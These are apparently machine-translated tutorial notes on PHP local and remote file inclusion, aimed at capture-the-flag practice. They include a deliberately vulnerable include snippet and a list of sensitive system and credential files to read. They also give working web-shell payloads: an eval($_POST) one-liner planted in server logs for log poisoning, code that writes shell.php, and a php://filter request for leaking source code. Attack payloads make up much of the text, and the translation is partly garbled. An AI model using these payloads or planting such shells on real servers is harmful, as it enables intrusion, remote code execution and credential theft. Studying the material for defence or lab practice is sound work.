file contains function
include function to call the file
require
<?php echo'<meta http-equiv="Content-Type" content="text/html;charset=gb2312" />'; // include '1.txt'; // $a = $_GET['page']; $a = "$_GET[page]"; // echo $a; include $a; ?>
include call a , here you can pass in any file to a, this file may be a Trojan horse file, and if you can pass in any file, it is a file inclusion vulnerability
remote file contains
Require allow_url_include=on in php.ini
For example: 127.0.0.1/cs/main.php?page=http://www.baidu.com/index.html The page in the file main.php is imported from Baidu
Common Sensitive Documents
In unix/linux system
/etc/passwd---------- generally stores some data of the user
The default configuration file of apache2 stored in /usr/local/app/apache2/conf/httpd.conf----------------
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf----------It stores virtual website settings
/usr/local/app/php5/lib/php.ini--------------------It stores PHP related settings
/etc/httpd/conf/httpd.conf--------stores the apache configuration file
/etc/my.cnf-------------------It stores the configuration file of mysql
windows system
C:\boot.ini----------------The system version can be viewed in it
C:\windows\systen32\inetsrv\MetaBase.xml--------is the IIS configuration file
C:\windows\repair\sam--------------------------Store the password for the initial installation of the windows system
C:\Program Files\mysql\my.ini--------------------It stores mysql configuration
C:\Program Files\mysql\data\mysql\user.MYD ----------------- store mysql root
C:\windows\php.ini-------------------------php configuration information
C:\windows\my.ini-------------------Store mysql configuration file
Common sensitive files----flag
1. The flag file
C://flag.txt exists in the root directory
2. The passwd file exists in flag
/etc/passwd
3. The flag file exists in the web root directory
4. The flag file exists in the current page
5. apache/php/mysql configuration There is a flag file under the file
Use the phpinfo() function to get the path
including the log file getshell
Visit http://127.0.0.1/<?php eval($_POST[111])?> on the page to avoid being url encoded in the web, we implant it in burpsuite
This is also our one-sentence Trojan horse will be brought into the log file, as long as allow_url_include=on is satisfied, we can pass the log file of the server locally and remotely through the file inclusion vulnerability as a parameter
Number to parse the one sentence Trojan we implanted to get the shell (must know the absolute path of the log file)
remote file contains write to a shell
<?php
fputs(fopen('shell.php','w'),'<?php eval($_POST[1]);?>');
?>
The fopen() function opens or creates a file named shell.php, and the fputs() function writes a Trojan horse in the shell.php file
We pass the file containing this code to the parameter with the file containing vulnerability, it will be executed, and a one-sentence Trojan horse file named shell.php will be created in the current directory.
PHP encapsulation protocol to read files
http://10.1.2.5:17857/cs/main.php?page=php://filter/read=convert.base64-encode/resource=main.php
Use the PHP protocol to interpret the file main.php with base64j to restore the source code of the file